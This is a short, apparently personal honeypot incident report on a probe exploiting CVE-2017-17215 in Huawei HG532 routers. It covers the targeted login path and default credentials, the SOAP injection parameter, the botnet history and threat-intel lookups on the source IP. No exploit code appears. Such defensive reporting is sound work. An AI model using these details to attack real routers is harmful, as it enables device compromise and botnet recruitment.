Attack Summary

On January 28, 2026 at 21:01:11 UTC, IP address 60[.]19[.]220[.]0 attempted to exploit my ICS honeypot with CVE-2017-17215, a remote code execution vulnerability in Huawei HG532 routers. The attack targeted /boaform/admin/formLogin with default credentials (username=user&psd=user) via HTTP/1.0.

The IP has two recent reports on AbuseIPDB, indicating active malicious scanning.

CVE-2017-17215

CVE-2017-17215 is a remote code execution flaw in Huawei HG532 home gateways discovered in November 2017. The vulnerability exists in the router’s UPnP implementation, where the TR-064 protocol (designed for local network configuration) was exposed to the WAN through port 37215¹.

Attackers inject malicious commands through the NewStatusURL parameter in SOAP/XML packets sent to port 37215². The vulnerability allows unauthenticated remote code execution, making it particularly dangerous for exposed devices.

Attack Pattern

The observed attack was a reconnaissance probe, likely a pre-exploitation fingerprinting attempt to identify vulnerable Huawei routers. The attacker used HTTP/1.0 with default credentials in order to test for the presence of the Huawei web interface before attempting the actual UPnP exploit.

In a successful attack chain, the reconnaissance would be followed by SOAP/XML payload delivery to port 37215, then remote command execution to download malware payloads. This attack was not succesful, because the honeypot is not emulating a Huawei router.

Historical Context

This exploit gained notoriety through the Satori botnet (also known as Okiru), a Mirai variant that began exploiting CVE-2017-17215 in December 2017³. The exploit code was publicly leaked on Pastebin during Christmas 2017 and has been weaponized by multiple botnets since then, including Brickerbot⁴.

The Cymulate Threat Research Group identified renewed exploitation activity in January 2025, with a new Mirai shell variant specifically targeting this vulnerability. The campaign uses wget to download malware payloads from command and control servers and employs the UPX executable packer to evade detection⁵.

Countries historically most affected by CVE-2017-17215 exploitation include the United States, Germany, Italy, and Egypt⁶.

IP Intel

The attacking IP 60[.]19[.]220[.]0 originates from the APNIC region (Asia-Pacific), most likely Taiwan or China based on the 60[.]0[.]0[.]0/8 allocation. The IP’s threat intelligence profile shows is clean except for 2 recent reports.

• VirusTotal: Clean (0 detections)
• CrowdSec: No reports
• AbuseIPDB: 2 recent reports

This suggests the IP is either a newly compromised device recently recruited into a botnet, or it’s conducting low-volume scanning to avoid detection thresholds. The Asia-Pacific region continues to be a significant source of IoT botnet activity.

Implications

Legacy vulnerability persistence: CVE-2017-17215 remains actively exploited nine years after its initial disclosure, demonstrating how legacy IoT vulnerabilities continue to provide value for botnet operators targeting unpatched devices.

Threat intelligence gaps: The IP appeared clean on most threat feeds despite active malicious behavior, highlighting blind spots in commercial threat intelligence platforms. Though recent AbuseIPDB reports validated the malicious activity, which certainly demonstrates the value of crowdsourced abuse reporting…

References